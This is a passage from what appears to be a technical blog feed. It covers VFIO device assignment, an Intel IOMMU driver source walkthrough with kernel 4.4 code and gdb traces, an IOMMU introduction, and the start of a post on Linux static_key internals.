<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> echo 15ad 07b0 > /sys/bus/pci/drivers/vfio-pci/new_id
</code></pre></div></div>
<p>Now we can see a new node created in ‘/dev/vfio/’, this is the group id.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu:~$ ls -l /dev/vfio/
total 0
crw------- 1 root root 243, 0 Aug 14 08:23 6
crw-rw-rw- 1 root root 10, 196 Aug 14 08:23 vfio
</code></pre></div></div>
<h3> 7 </h3>
<p>Start qemu with the assigned device.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> x86_64-softmmu/qemu-system-x86_64 -m 1024 -smp 4 -hda /home/test/test.img --enable-kvm -vnc :0 -device vfio-pci,host=03:00.0,id=net0
</code></pre></div></div>
<p>Now we can see the device in the guest, and its driver is vmxnet3.</p>
<p><img src="/assets/img/vfio1/1.png" alt="" /></p>
intel IOMMU driver analysis2019-08-10T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/08/10/iommu-driver-analysis
<p>In the last post <a href="https://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/08/04/iommu-introduction">IOMMU introduction</a> we have got the basic idea of what is IOMMU and what it is for. In this post, we will dig into the intel-iommu driver source. The kernel version as before is 4.4.</p>
<p>In order to experiment the IOMMU we start a VM with vIOMMU, following is the command line:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> gdb --args x86_64-softmmu/qemu-system-x86_64 -machine q35,accel=kvm,kernel-irqchip=split -m 1G -device intel-iommu -hda ~/test.img
</code></pre></div></div>
<p>In order to enable the intel-iommu we need to add ‘intel_iommu=on’ to the kernel command line.</p>
<p>This post contains the following five parts:</p>
<ul>
<li>intel-iommu initialization</li>
<li>DMAR table parsing</li>
<li>DMAR initialization</li>
<li>Add device to iommu group</li>
<li>DMA operation without and with IOMMU</li>
</ul>
<h3> intel-iommu initialization </h3>
<p>The BIOS is responsible for detecting the remapping hardware functions and reports the remapping hardware units through the DMA Remapping Reporting (DMAR) ACPI table. The DMAR ACPI table’s format is defined in VT-d spec 8.1. In summary,
the DMAR ACPI table contains one DMAR remapping reporting structure and several remapping structures. qemu creates this DMAR ACPI table data in the function ‘build_dmar_q35’.</p>
<p>‘DMAR remapping reporting structure’ contains a standard ACPI table header with some specific data for ‘DMAR’. There are several kinds of ‘Remapping Structure Types’. The type ‘0’ is DMA Remapping Hardware Unit(DRHD) structure, this is the most important structure. A DRHD structure represents a remapping hardware unit present in the platform. Following figure shows the format of DRHD.</p>
<p><img src="/assets/img/iommu_driver/1.png" alt="" /></p>
<p>Here the ‘Segment Number’ is the PCI Segment associated with this unit. PCI segments exist for servers that need many PCI buses: such a system has more than one PCI root bridge, and each root bridge’s tree is a PCI domain/segment. The ‘Flags’ field currently has only one valid bit: if ‘INCLUDE_PCI_ALL’ is set, the intel-iommu represented by this DRHD controls all PCI compatible devices, except devices reported under the scope of other DRHDs. The ‘Device Scope[]’ contains zero or more Device Scope Entries; each entry can indicate a PCI endpoint device that is controlled by this DRHD. If the iommu supports the interrupt remapping capability, each IOxAPIC in the platform reported by the MADT ACPI table must be explicitly enumerated under the Device Scope of the appropriate remapping hardware unit. In ‘build_dmar_q35’, qemu creates only one DRHD with an ‘IOAPIC’ device scope entry. If ‘device-iotlb’ is supported, there is also a ‘Root Port ATS Capability Reporting (ATSR) Structure’.</p>
<p>The kernel handles the ‘intel_iommu=’ parameter in the ‘intel_iommu_setup’ function; for ‘intel_iommu=on’, ‘dmar_disabled’ is set to 0. The kernel function ‘detect_intel_iommu’ detects the intel-iommu device. It calls ‘dmar_table_detect’ to map the DMAR ACPI table into the kernel, pointed to by ‘dmar_tbl’, then walks the table with ‘dmar_res_callback’. There is only a ‘dmar_validate_one_drhd’ callback for the DRHD table, which returns 0 if the DRHD is valid. So finally ‘iommu_detected’ is set to 1 and ‘x86_init.iommu.iommu_init’ is set to ‘intel_iommu_init’.</p>
<p>Later, in ‘pci_iommu_init’, the ‘iommu_init’ callback is called; ‘intel_iommu_init’ initializes the intel-iommu device.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int __init intel_iommu_init(void)
{
int ret = -ENODEV;
struct dmar_drhd_unit *drhd;
struct intel_iommu *iommu;
/* VT-d is required for a TXT/tboot launch, so enforce that */
force_on = tboot_force_iommu();
if (iommu_init_mempool()) {
if (force_on)
panic("tboot: Failed to initialize iommu memory\n");
return -ENOMEM;
}
down_write(&dmar_global_lock);
if (dmar_table_init()) {
if (force_on)
panic("tboot: Failed to initialize DMAR table\n");
goto out_free_dmar;
}
if (dmar_dev_scope_init() < 0) {
if (force_on)
panic("tboot: Failed to initialize DMAR device scope\n");
goto out_free_dmar;
}
...
if (dmar_init_reserved_ranges()) {
if (force_on)
panic("tboot: Failed to reserve iommu ranges\n");
goto out_free_reserved_range;
}
init_no_remapping_devices();
ret = init_dmars();
...
up_write(&dmar_global_lock);
pr_info("Intel(R) Virtualization Technology for Directed I/O\n");
init_timer(&unmap_timer);
#ifdef CONFIG_SWIOTLB
swiotlb = 0;
#endif
dma_ops = &intel_dma_ops;
init_iommu_pm_ops();
for_each_active_iommu(iommu, drhd)
iommu->iommu_dev = iommu_device_create(NULL, iommu,
intel_iommu_groups,
"%s", iommu->name);
bus_set_iommu(&pci_bus_type, &intel_iommu_ops);
bus_register_notifier(&pci_bus_type, &device_nb);
if (si_domain && !hw_pass_through)
register_memory_notifier(&intel_iommu_memory_nb);
intel_iommu_enabled = 1;
return 0;
...
}
</code></pre></div></div>
<p>‘iommu_init_mempool’ creates some caches. ‘dmar_table_init’ parses the DMAR table. ‘dmar_dev_scope_init’ does some initialization for the ‘Device Scope’ entries in the DRHD. ‘dmar_init_reserved_ranges’ reserves all PCI MMIO addresses to avoid peer-to-peer access. As the name indicates, ‘init_no_remapping_devices’ initializes the no-remapping devices. ‘init_dmars’ is an important function which I will analyze in its own section later. For every iommu device, ‘iommu_device_create’ creates a sysfs device. ‘bus_set_iommu’ adds each PCI device to the appropriate iommu group and also registers a notifier to get device-add notifications.</p>
<h3> DMAR table parsing </h3>
<p>‘intel_iommu_init’ calls ‘dmar_table_init’ which calls ‘parse_dmar_table’ to do the DMAR table parsing.
‘parse_dmar_table’ prepares a ‘dmar_res_callback’ struct which contains a handler for every kind of remapping structure. Then ‘dmar_table_detect’ is called again to map the DMAR ACPI table to ‘dmar_tbl’. Later, ‘dmar_walk_dmar_table’ is called with the ‘dmar_res_callback’ to walk ‘dmar_tbl’ and invoke the corresponding handler for each remapping structure. For our qemu case, only a DRHD is present; its handler is ‘dmar_parse_one_drhd’.</p>
<p>‘dmar_parse_one_drhd’ parses the DRHD and creates a ‘dmar_drhd_unit’ struct, defined as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct dmar_drhd_unit {
struct list_head list; /* list of drhd units */
struct acpi_dmar_header *hdr; /* ACPI header */
u64 reg_base_addr; /* register base address*/
struct dmar_dev_scope *devices;/* target device array */
int devices_cnt; /* target device count */
u16 segment; /* PCI domain */
u8 ignored:1; /* ignore drhd */
u8 include_all:1;
struct intel_iommu *iommu;
};
</code></pre></div></div>
<p>Most of the fields are explained by the comments; the ‘iommu’ is allocated and initialized by the ‘alloc_iommu’ function.
‘alloc_iommu’ maps the MMIO of the iommu device and does some initialization work according to the register base address. At the end of ‘dmar_parse_one_drhd’, it calls ‘dmar_register_drhd_unit’ to add the new ‘dmar_drhd_unit’ to the ‘dmar_drhd_units’ list. The following figure shows the relation between ‘dmar_drhd_unit’ and ‘intel_iommu’.</p>
<p><img src="/assets/img/iommu_driver/2.png" alt="" /></p>
<p>‘dmar_dev_scope_init’ initializes the Device Scope Entries in the DRHD, but as our single DRHD sets the ‘INCLUDE_PCI_ALL’ flag, it actually does nothing.</p>
<p>‘dmar_init_reserved_ranges’ reserves the ‘IOAPIC’ range and all PCI MMIO addresses, so that a PCI device’s DMA will not use these IOVAs.</p>
<p>‘init_no_remapping_devices’ also does nothing as our DRHD sets the ‘INCLUDE_PCI_ALL’ flag.</p>
<h3> DMAR initialization </h3>
<p>So we come to the ‘init_dmars’ function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int __init init_dmars(void)
{
struct dmar_drhd_unit *drhd;
struct dmar_rmrr_unit *rmrr;
bool copied_tables = false;
struct device *dev;
struct intel_iommu *iommu;
int i, ret;
/*
* for each drhd
* allocate root
* initialize and program root entry to not present
* endfor
*/
for_each_drhd_unit(drhd) {
/*
* lock not needed as this is only incremented in the single
* threaded kernel __init code path all other access are read
* only
*/
if (g_num_of_iommus < DMAR_UNITS_SUPPORTED) {
g_num_of_iommus++;
continue;
}
pr_err_once("Exceeded %d IOMMUs\n", DMAR_UNITS_SUPPORTED);
}
/* Preallocate enough resources for IOMMU hot-addition */
if (g_num_of_iommus < DMAR_UNITS_SUPPORTED)
g_num_of_iommus = DMAR_UNITS_SUPPORTED;
g_iommus = kcalloc(g_num_of_iommus, sizeof(struct intel_iommu *),
GFP_KERNEL);
if (!g_iommus) {
pr_err("Allocating global iommu array failed\n");
ret = -ENOMEM;
goto error;
}
deferred_flush = kzalloc(g_num_of_iommus *
sizeof(struct deferred_flush_tables), GFP_KERNEL);
if (!deferred_flush) {
ret = -ENOMEM;
goto free_g_iommus;
}
for_each_active_iommu(iommu, drhd) {
g_iommus[iommu->seq_id] = iommu;
intel_iommu_init_qi(iommu);
ret = iommu_init_domains(iommu);
if (ret)
goto free_iommu;
init_translation_status(iommu);
if (translation_pre_enabled(iommu) && !is_kdump_kernel()) {
iommu_disable_translation(iommu);
clear_translation_pre_enabled(iommu);
pr_warn("Translation was enabled for %s but we are not in kdump mode\n",
iommu->name);
}
/*
* TBD:
* we could share the same root & context tables
* among all IOMMU's. Need to Split it later.
*/
ret = iommu_alloc_root_entry(iommu);
if (ret)
goto free_iommu;
...
}
/*
* Now that qi is enabled on all iommus, set the root entry and flush
* caches. This is required on some Intel X58 chipsets, otherwise the
* flush_context function will loop forever and the boot hangs.
*/
for_each_active_iommu(iommu, drhd) {
iommu_flush_write_buffer(iommu);
iommu_set_root_entry(iommu);
iommu->flush.flush_context(iommu, 0, 0, 0, DMA_CCMD_GLOBAL_INVL);
iommu->flush.flush_iotlb(iommu, 0, 0, 0, DMA_TLB_GLOBAL_FLUSH);
}
...
/*
* If we copied translations from a previous kernel in the kdump
* case, we can not assign the devices to domains now, as that
* would eliminate the old mappings. So skip this part and defer
* the assignment to device driver initialization time.
*/
if (copied_tables)
goto domains_done;
...
domains_done:
/*
* for each drhd
* enable fault log
* global invalidate context cache
* global invalidate iotlb
* enable translation
*/
for_each_iommu(iommu, drhd) {
if (drhd->ignored) {
/*
* we always have to disable PMRs or DMA may fail on
* this device
*/
if (force_on)
iommu_disable_protect_mem_regions(iommu);
continue;
}
iommu_flush_write_buffer(iommu);
#ifdef CONFIG_INTEL_IOMMU_SVM
if (pasid_enabled(iommu) && ecap_prs(iommu->ecap)) {
ret = intel_svm_enable_prq(iommu);
if (ret)
goto free_iommu;
}
#endif
ret = dmar_set_interrupt(iommu);
if (ret)
goto free_iommu;
if (!translation_pre_enabled(iommu))
iommu_enable_translation(iommu);
iommu_disable_protect_mem_regions(iommu);
}
return 0;
...
}
</code></pre></div></div>
<p>First it iterates over ‘dmar_drhd_units’ to get the number of iommu devices, stored in ‘g_num_of_iommus’, and allocates space for all the iommu pointers, stored in ‘g_iommus’. Then the ‘for_each_active_iommu’ loop initializes each iommu device.</p>
<p>In the loop, ‘intel_iommu_init_qi’ initializes the queued invalidation interface, described in VT-d spec 6.5.2. It allocates the queued invalidation interface’s ring buffer, stores it in ‘iommu->qi’, and writes its physical address to the iommu device’s ‘DMAR_IQA_REG’ register.</p>
<p>Back in the loop, after the queued invalidation initialization finishes, ‘iommu_init_domains’ is called to initialize the domain-related data structures. Quoting the VT-d spec: a domain is abstractly defined as an isolated environment in the platform, to which a subset of the host physical memory is allocated. I/O devices that are allowed to access physical memory directly are allocated to a domain and are referred to as the domain’s assigned devices. For virtualization usages, software may treat each virtual machine as a domain. ‘iommu_init_domains’ allocates a bitmap for the domain ids, stored in ‘iommu->domain_ids’. A domain is represented by the ‘dmar_domain’ struct. An iommu can support many domains, but typically only a few are in use, so the driver does not preallocate all the ‘dmar_domain *’ pointers. Instead it uses a two-level allocation: ‘iommu->domains’ points to an array of ‘dmar_domain **’, and each ‘iommu->domains[i]’ points to a second-level array. Initially only 256 ‘dmar_domain *’ pointers are allocated.</p>
<p>In the loop, the root table is allocated by calling ‘iommu_alloc_root_entry’.</p>
<p>‘init_dmars’ then does a second ‘for_each_active_iommu’ loop; this time it programs the root table’s base address into the hardware by calling ‘iommu_set_root_entry’ and flushes the context cache and IOTLB.</p>
<p>‘init_dmars’ calls ‘iommu_prepare_isa’ to set up an identity map for the ISA bridge. Then we come to the final ‘for_each_iommu’ loop: it first flushes the write buffer by calling ‘iommu_flush_write_buffer’, then requests an irq to log DMA remapping faults, and finally calls ‘iommu_enable_translation’ to enable translation.</p>
<p>After ‘init_dmars’, the data structures are shown below.</p>
<p><img src="/assets/img/iommu_driver/3.png" alt="" /></p>
<h3> Add device to iommu group </h3>
<p>An IOMMU group is the smallest set of devices that can be considered isolated from the perspective of the IOMMU. Some devices can do peer-to-peer DMA without the involvement of the IOMMU; if such devices were given different IOVA page tables and then did peer-to-peer DMA, errors would result. Alex Williamson has written a great post explaining IOMMU groups: <a href="http://vfio.blogspot.com/2014/08/iommu-groups-inside-and-out.html">IOMMU Groups, inside and out</a>. In ‘intel_iommu_init’, ‘bus_set_iommu’ is called to place each PCI device into its iommu group.</p>
<p>‘bus_set_iommu’ is used to set iommu-callback for the bus. Following sets the pci bus’s iommu callback to intel_iommu_ops.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bus_set_iommu(&pci_bus_type, &intel_iommu_ops);
</code></pre></div></div>
<p>‘bus_set_iommu’ sets ‘bus->iommu_ops’ to the ‘ops’ parameter, then calls ‘iommu_bus_init’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int iommu_bus_init(struct bus_type *bus, const struct iommu_ops *ops)
{
int err;
struct notifier_block *nb;
struct iommu_callback_data cb = {
.ops = ops,
};
nb = kzalloc(sizeof(struct notifier_block), GFP_KERNEL);
if (!nb)
return -ENOMEM;
nb->notifier_call = iommu_bus_notifier;
err = bus_register_notifier(bus, nb);
if (err)
goto out_free;
err = bus_for_each_dev(bus, NULL, &cb, add_iommu_group);
if (err)
goto out_err;
return 0;
out_err:
/* Clean up */
bus_for_each_dev(bus, NULL, &cb, remove_iommu_group);
bus_unregister_notifier(bus, nb);
out_free:
kfree(nb);
return err;
}
</code></pre></div></div>
<p>‘iommu_bus_init’ registers a notifier for bus events, which is useful for hot-plugged devices. The main work is to call ‘add_iommu_group’ for every PCI device. ‘add_iommu_group’ just calls the ‘iommu_ops’ add_device callback, which is ‘intel_iommu_add_device’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int intel_iommu_add_device(struct device *dev)
{
struct intel_iommu *iommu;
struct iommu_group *group;
u8 bus, devfn;
iommu = device_to_iommu(dev, &bus, &devfn);
if (!iommu)
return -ENODEV;
iommu_device_link(iommu->iommu_dev, dev);
group = iommu_group_get_for_dev(dev);
if (IS_ERR(group))
return PTR_ERR(group);
iommu_group_put(group);
return 0;
}
</code></pre></div></div>
<p>First, it gets the ‘intel_iommu’ associated with the device ‘dev’, as well as the device’s ‘bus’ and ‘devfn’.
This is quite easy: take the device’s domain (segment) id and use it to find the ‘intel_iommu’ in the ‘dmar_drhd_units’ list.</p>
<p>The ‘iommu_device_link’ function is also trivial: it creates an ‘iommu’ symlink in the PCI device directory pointing to the iommu device directory, and a link in the iommu’s ‘devices’ directory pointing back to the PCI device.</p>
<p>The most important call is ‘iommu_group_get_for_dev’; this function finds or creates the IOMMU group for a device.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct iommu_group *iommu_group_get_for_dev(struct device *dev)
{
const struct iommu_ops *ops = dev->bus->iommu_ops;
struct iommu_group *group;
int ret;
group = iommu_group_get(dev);
...
if (ops && ops->device_group)
group = ops->device_group(dev);
...
ret = iommu_group_add_device(group, dev);
...
return group;
}
</code></pre></div></div>
<p>A device’s iommu group is stored in the iommu_group field of the ‘device’ struct. ‘iommu_group_get’ returns it; if it’s not NULL, that group is returned directly. The first time it is NULL, so the ‘iommu_ops’ device_group callback is called, which is ‘pci_device_group’ for the Intel IOMMU.</p>
<p>‘pci_device_group’ finds or creates an IOMMU group for a device. There are several cases where a device gets its IOMMU group from an existing device.
For example, if a bridge does not support ACS, the devices below it cannot be isolated from each other, so we need to go up to the upstream bus. Likewise, all functions of a multi-function device may need to share the same IOMMU group. If ‘pci_device_group’ can’t find an existing IOMMU group, it calls ‘iommu_group_alloc’ to create a new one. ‘iommu_group_alloc’ creates a numbered directory under ‘/sys/kernel/iommu_groups’, for example ‘/sys/kernel/iommu_groups/3’.</p>
<p>After getting the device’s IOMMU group, ‘iommu_group_get_for_dev’ calls ‘iommu_group_add_device’ to add the device to the group. It first creates an ‘iommu_group’ link in the PCI device’s directory pointing to ‘/sys/kernel/iommu_groups/$group_id’, then creates a link ‘/sys/kernel/iommu_groups/$group_id/devices/0000:$pci_bdf’ pointing to the PCI device.
Finally it sets the device’s iommu_group to ‘group’ and adds the device to the ‘group->devices’ list.</p>
<p>That was a lot of functions, so let’s wrap it up with the call chain:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>intel_iommu_init
 ->bus_set_iommu
   ->iommu_bus_init
     ->add_iommu_group (called for each PCI device)
       ->iommu_ops->add_device (intel_iommu_add_device)
         ->device_to_iommu
         ->iommu_device_link
         ->iommu_group_get_for_dev
           ->iommu_ops->device_group (pci_device_group)
             ->iommu_group_alloc
           ->iommu_group_add_device
</code></pre></div></div>
<h3> DMA operation without and with IOMMU </h3>
<p>Now that the IOMMU has been initialized, what is the difference between DMA with and without the IOMMU? In this part I will do some analysis, but not cover every detail of DMA.</p>
<p>A device driver uses the ‘dma_alloc_coherent’ function to allocate physical memory for DMA. It returns the virtual address, and the DMA address is returned through the third argument. ‘dma_alloc_coherent’ calls ‘dma_ops->alloc’. ‘dma_ops’ is set to ‘intel_dma_ops’ in ‘intel_iommu_init’; for the Intel IOMMU this callback is ‘intel_alloc_coherent’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void *intel_alloc_coherent(struct device *dev, size_t size,
dma_addr_t *dma_handle, gfp_t flags,
struct dma_attrs *attrs)
{
struct page *page = NULL;
int order;
size = PAGE_ALIGN(size);
order = get_order(size);
if (!iommu_no_mapping(dev))
flags &= ~(GFP_DMA | GFP_DMA32);
else if (dev->coherent_dma_mask < dma_get_required_mask(dev)) {
if (dev->coherent_dma_mask < DMA_BIT_MASK(32))
flags |= GFP_DMA;
else
flags |= GFP_DMA32;
}
if (gfpflags_allow_blocking(flags)) {
unsigned int count = size >> PAGE_SHIFT;
page = dma_alloc_from_contiguous(dev, count, order);
if (page && iommu_no_mapping(dev) &&
page_to_phys(page) + size > dev->coherent_dma_mask) {
dma_release_from_contiguous(dev, page, count);
page = NULL;
}
}
if (!page)
page = alloc_pages(flags, order);
if (!page)
return NULL;
memset(page_address(page), 0, size);
*dma_handle = __intel_map_single(dev, page_to_phys(page), size,
DMA_BIDIRECTIONAL,
dev->coherent_dma_mask);
if (*dma_handle)
return page_address(page);
if (!dma_release_from_contiguous(dev, page, size >> PAGE_SHIFT))
__free_pages(page, order);
return NULL;
}
</code></pre></div></div>
<p>It first allocates the memory needed (by calling ‘dma_alloc_from_contiguous’ or just ‘alloc_pages’), then calls ‘__intel_map_single’ to set up the memory mapping.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static dma_addr_t __intel_map_single(struct device *dev, phys_addr_t paddr,
size_t size, int dir, u64 dma_mask)
{
struct dmar_domain *domain;
phys_addr_t start_paddr;
struct iova *iova;
int prot = 0;
int ret;
struct intel_iommu *iommu;
unsigned long paddr_pfn = paddr >> PAGE_SHIFT;
...
domain = get_valid_domain_for_dev(dev);
if (!domain)
return 0;
iommu = domain_get_iommu(domain);
size = aligned_nrpages(paddr, size);
iova = intel_alloc_iova(dev, domain, dma_to_mm_pfn(size), dma_mask);
if (!iova)
goto error;
...
ret = domain_pfn_mapping(domain, mm_to_dma_pfn(iova->pfn_lo),
mm_to_dma_pfn(paddr_pfn), size, prot);
...
start_paddr = (phys_addr_t)iova->pfn_lo << PAGE_SHIFT;
start_paddr += paddr & ~PAGE_MASK;
return start_paddr;
...
}
</code></pre></div></div>
<p>The skeleton of ‘__intel_map_single’ is shown above. First it gets/creates a domain by calling ‘get_valid_domain_for_dev’, then allocates the IOVA by calling ‘intel_alloc_iova’, and finally sets up the IOVA->physical address mapping by calling ‘domain_pfn_mapping’. The IOVA is returned as the DMA address.</p>
<p>As the domain’s definition indicates, when the system allocates physical memory to a device, a domain needs to be bound to that physical memory. A domain is described by the ‘dmar_domain’ structure.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct dmar_domain {
int nid; /* node id */
unsigned iommu_refcnt[DMAR_UNITS_SUPPORTED];
/* Refcount of devices per iommu */
u16 iommu_did[DMAR_UNITS_SUPPORTED];
/* Domain ids per IOMMU. Use u16 since
* domain ids are 16 bit wide according
* to VT-d spec, section 9.3 */
struct list_head devices; /* all devices' list */
struct iova_domain iovad; /* iova's that belong to this domain */
struct dma_pte *pgd; /* virtual address */
int gaw; /* max guest address width */
/* adjusted guest address width, 0 is level 2 30-bit */
int agaw;
int flags; /* flags to find out type of domain */
int iommu_coherency;/* indicate coherency of iommu access */
int iommu_snooping; /* indicate snooping control feature*/
int iommu_count; /* reference count of iommu */
int iommu_superpage;/* Level of superpages supported:
0 == 4KiB (no superpages), 1 == 2MiB,
2 == 1GiB, 3 == 512GiB, 4 == 1TiB */
u64 max_addr; /* maximum mapped address */
struct iommu_domain domain; /* generic domain data structure for
iommu core */
};
</code></pre></div></div>
<p>‘iovad’ contains an rb-tree holding all of the IOVAs of the domain. ‘pgd’ is the page table directory used for the IOVA->physical address translation. ‘domain’ contains the generic domain data structure.
The domain is allocated in ‘get_domain_for_dev’.</p>
<p>In ‘get_domain_for_dev’, the domain is allocated by calling ‘alloc_domain’ and initialized by calling ‘domain_init’.
In ‘domain_init’, ‘init_iova_domain’ initializes ‘iovad’, setting the start pfn of the IOVA space to 1 and the end pfn to 4G. ‘domain_reserve_special_ranges’ reserves the special physical ranges recorded in ‘reserved_iova_list’, which means an IOVA can never be an address in that list. ‘alloc_pgtable_page’ allocates a page as the page table directory and stores it in ‘domain->pgd’.</p>
<p>In ‘get_domain_for_dev’, ‘dmar_insert_one_dev_info’ is called to allocate a ‘device_domain_info’ and store it in the device’s archdata.iommu field. At the end of ‘dmar_insert_one_dev_info’ there is an important step: calling ‘domain_context_mapping’. ‘domain_context_mapping’ calls ‘domain_context_mapping_one’ to set up the IOMMU DMA remapping page table. In ‘domain_context_mapping_one’, ‘iommu_context_addr’ is called to get the context entry in the context table, then ‘context_set_address_root’ sets the context entry’s address root to the physical address of the domain’s pgd.</p>
<p>After getting/creating the domain, ‘__intel_map_single’ calls ‘intel_alloc_iova’ to allocate an IOVA range of the requested size in this domain, then calls ‘domain_pfn_mapping’ to set up the mapping. ‘__domain_mapping’ does the actual work.</p>
<p>In ‘__domain_mapping’, ‘pfn_to_dma_pte’ allocates the not-yet-present ptes for the IOVA address and sets them. After ‘__domain_mapping’ we have a page table which translates the IOVA to a physical address.</p>
<p>Following figure shows the data structure relation.</p>
<p><img src="/assets/img/iommu_driver/4.png" alt="" /></p>
<p>With the IOMMU, we can see that the DMA address is 0xffffxxxx while the host physical address is 0x384f2000.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) b vtd_iommu_translate
Breakpoint 2 at 0x5555572724f2: file /home/test/qemu5/qemu/hw/i386/intel_iommu.c, line 2882.
(gdb) c
Continuing.
Thread 1 "qemu-system-x86" hit Breakpoint 2, vtd_iommu_translate (iommu=0x61a000019ef0, addr=4294951088, flag=IOMMU_WO, iommu_idx=0) at /home/test/qemu5/qemu/hw/i386/intel_iommu.c:2882
2882 {
(gdb) finish
Run till exit from #0 vtd_iommu_translate (iommu=0x61a000019ef0, addr=4294951088, flag=IOMMU_WO, iommu_idx=0) at /home/test/qemu5/qemu/hw/i386/intel_iommu.c:2882
address_space_translate_iommu (iommu_mr=0x61a000019ef0, xlat=0x7fffffffc420, plen_out=0x7fffffffc3e0, page_mask_out=0x0, is_write=true, is_mmio=true, target_as=0x7fffffffc290, attrs=...) at /home/test/qemu5/qemu/exec.c:493
493 if (!(iotlb.perm & (1 << is_write))) {
Value returned is $5 = {target_as = 0x55555ad79380 <address_space_memory>, iova = 4294950912, translated_addr = 944709632, addr_mask = 4095, perm = IOMMU_RW}
(gdb) p /x $5
$6 = {target_as = 0x55555ad79380, iova = 0xffffc000, translated_addr = 0x384f2000, addr_mask = 0xfff, perm = 0x3}
</code></pre></div></div>
<p>Without the IOMMU, we can see that the DMA address is just the host physical address.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Thread 4 "qemu-system-x86" hit Breakpoint 1, pci_dma_write (dev=0x7fffa3eba800, addr=946098204, buf=0x7fffe4ba6bbc, len=4) at /home/test/qemu5/qemu/include/hw/pci/pci.h:795
795 return pci_dma_rw(dev, addr, (void *) buf, len, DMA_DIRECTION_FROM_DEVICE);
(gdb) p /x addr
$1 = 0x3864501c
(gdb)
</code></pre></div></div>
IOMMU introduction2019-08-04T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/08/04/iommu-introduction
<p>The MMU is used by the CPU to translate virtual addresses to physical addresses; the virtual address is from the CPU’s point of view. The IOMMU, in contrast, is used by devices to translate another kind of virtual address, the IOVA (IO virtual address), to a physical address. The following shows
the basic idea of the IOMMU.</p>
<p><img src="/assets/img/iommu/1.png" alt="" /></p>
<p>The IOMMU is very useful for device assignment on virtual machine platforms. Device assignment directly assigns a physical IO device to a VM: the driver for the assigned device runs in the VM to which it is assigned and is allowed to interact directly with the device hardware with minimal or no VMM involvement. Device assignment has very high performance compared with software-based device emulation and virtio-based device emulation.</p>
<p>Device assignment raises an issue similar to how a virtual machine accesses its physical memory.
In a virtual machine, the guest OS uses virtual addresses to access data; a guest virtual address (GVA) is translated to a guest physical address (GPA). However, the data really lives at a host physical address, and the GPA->HPA translation is done by EPT in VT-x hardware. For device assignment, the driver in the guest OS specifies a guest physical address for DMA, yet the physical IO device needs the host physical address to access memory. The device therefore needs something like EPT to translate the DMA address (GPA) specified by the guest driver into a host physical address. This is the main purpose of the IOMMU.
The IOMMU also has the ability to isolate and restrict device accesses to the resources (the physical memory allocated to the VM, for example) owned by the virtual machine. The following figure depicts how system software interacts with hardware support for both VT-x and VT-d.</p>
<p><img src="/assets/img/iommu/2.png" alt="" /></p>
<p>Intel IOMMU(also called VT-d) has the following capabilities:</p>
<ul>
<li>DMA remapping: this supports address translations for DMA from device.</li>
<li>Interrupt remapping: this supports isolation and routing of interrupts from devices and external interrupt controllers to appropriate VMs.</li>
<li>Interrupt posting: this supports direct delivery of virtual interrupts from devices and external interrupt controllers to virtual processors.</li>
</ul>
<p>qemu/kvm virtual machines now use VFIO to do device assignment. VFIO utilizes the IOMMU’s DMA remapping for DMA in the VM, but it doesn’t use interrupt remapping, as that is not efficient compared with the in-kernel irqfd, IMO.</p>
<p>The basic idea of IOMMU DMA remapping is the same as the MMU’s address translation.
When a physical IO device does DMA, the address used for DMA is called the IOVA. The IOMMU first uses the device’s address (the PCI BDF) to find a page table, then uses the IOVA to walk this page table and finally gets the host physical address. This is very much like how the MMU translates a virtual address to a physical address. The following figure shows the basic idea of DMA remapping in legacy mode; there is also a scalable mode, and though the details differ, the idea is the same.</p>
<p><img src="/assets/img/iommu/3.png" alt="" /></p>
<p>The device’s bus number is used to index into the Root Table. The root table is 4 KBytes in size and contains 256 root entries. A root entry contains a context-table pointer which references the context table for all the devices on the bus identified by that root entry.</p>
<p>A context-entry maps a specific I/O device on a bus to the domain to which it is assigned, and, in
turn, to the address translation structures for the domain. Each context-table contains 256 entries,
with each entry corresponding to a PCI device function on the bus. For a PCI device, the device and
function numbers (lower 8-bits) are used to index into the context-table.</p>
<p>The root table and context tables are set up by the IOMMU driver; the page table is usually set up by the VMM, though any software that programs the IOMMU can set it up. The IOVA is the input of the IOMMU translation and is an address from the device’s point of view. The IOVA can be any address that is meaningful to the guest or process; for example, qemu/kvm uses the GPA as the IOVA, but another address could be used as well. VFIO uses the IOMMU to do the translation from GPA to HPA.</p>
<p>Next I will write a code analysis of the Intel IOMMU driver. I will also write a post on the IOMMU hardware emulation, as qemu implements both the AMD and Intel IOMMU.</p>
Linux static_key internals2019-07-20T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/07/20/linux-static-key-internals
<h3> static_key introduction </h3>
<p>There is often a situation where we need to check some switch to determine which code flow to execute. In some cases the switch is almost always in the same state (true or false), so the check itself may hurt performance. static_key and jump label let us patch the code at the site of the check instead. With a static_key there is no runtime check, just straight-line code. There are a lot of introductions to static_key usage, but few to its internals. This post tries to explain the static_key machinery under the surface. It uses kernel 4.4, as that is the code I have at hand.</p>
<p>There are three aspects for static_key:</p>
<ol>
